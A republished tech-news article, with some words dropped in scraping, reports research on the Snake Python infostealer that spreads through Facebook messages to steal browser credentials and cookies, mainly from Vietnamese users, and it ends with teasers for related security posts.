Facebook messages hijacked to steal personal info and details

Home / QSOL IT News / boost / Facebook messages hijacked to steal personal info and details

New research has revealed that threat actors are leveraging messages to deploy a sophisticated Python-based , known as Snake.

Researchers at Cyberason have shared details of the attack, indicating that Snake’s primary objective is to capture sensitive and credentials from unsuspecting users.

It looks to be a relatively new campaign, which was first brought to light on X in August , shows bias towards Vietnamese victims.

Facebook infostealer targeting Vietnamese users

The attack uses seemingly harmless RAR or ZIP , which, once opened, trigger an infection sequence that involves two additional downloaders – a batch script and a cmd script. The cmd script is responsible for executing the Snake infostealer from an actor-controlled GitLab repo.

Cybereason has identified three distinct variants of the Snake infostealer – the third is an executable assembled by PyInstaller and targets users of the Coc Coc browser, suggesting a specific focus on Vietnamese users.

Once harvested, credentials and cookies are shared via numerous platforms, including Discord, GitHub, and Telegram.

The malware also targets Facebook accounts by extracting cookie information, which could indicate a goal of hijacking accounts, potentially for malicious purposes.

The to is further reinforced by the naming conventions of the actor-controlled repositories, which allegedly reference the Vietnamese language in the source code.

Cybereason also noted that the malware targets other used globally, including Brave, Chromium, Google Chrome Browser, Microsoft Edge, Mozilla Firefox, and Opera Web Browser.

The comes amid increased scrutiny of Facebook for its perceived failure to assist victims of account takeovers.

TechRadar Pro has asked Meta to share information about how users can boost their protection against such attacks, and whether the company has any plans to prevent future attacks. In the meantime, users can follow best practices to help protect their accounts, including using complex and two-factor authentication (2FA).

More from TechRadar Pro

Source link

Related Post

Cybersecurity Threat Advisory: Microsoft SharePoint connector vulnerability

A critical security vulnerability was identified in Microsoft Power Platform’s SharePoint connector. The flaw allows attackers to harvest user credentials

app, critical vulnerability, cybersecurity, Cybersecurity Threat Advisory, Featured, Microsoft, Microsoft Sharepoint, Power Platform, Security, security vulnerability, SSRF, Syndicated, Threat Advisory

Entra Password Protection Smarter Security, Fewer Pop-Tarts

Alright, let’s be real—passwords are the worst. If you can, ditch them altogether and embrace the wonderful world of passwordless

ahead, Azure, Entra Password Protection, game, Microsoft, passwordless authentication, Passwords, Security, Syndicated

o3-mini is here and ships today on Azure

The post o3-mini is here and ships today on Azure AI Foundry and GitHub Copilot and Models… can’t wait to

AI, Azure, Exec posts, Mini, Recent News, Syndicated, today

Cybersecurity Threat Advisory: MintsLoader campaign threat

A cyber campaign has been identified using the MintsLoader malware loader to deliver secondary payloads, such as the StealC information

BOINC, cybersecurity, Cybersecurity Threat Advisory, DDoS, Featured, malware loader, MintsLoader, MintsLoader malware, phishing, Security, StealC, Syndicated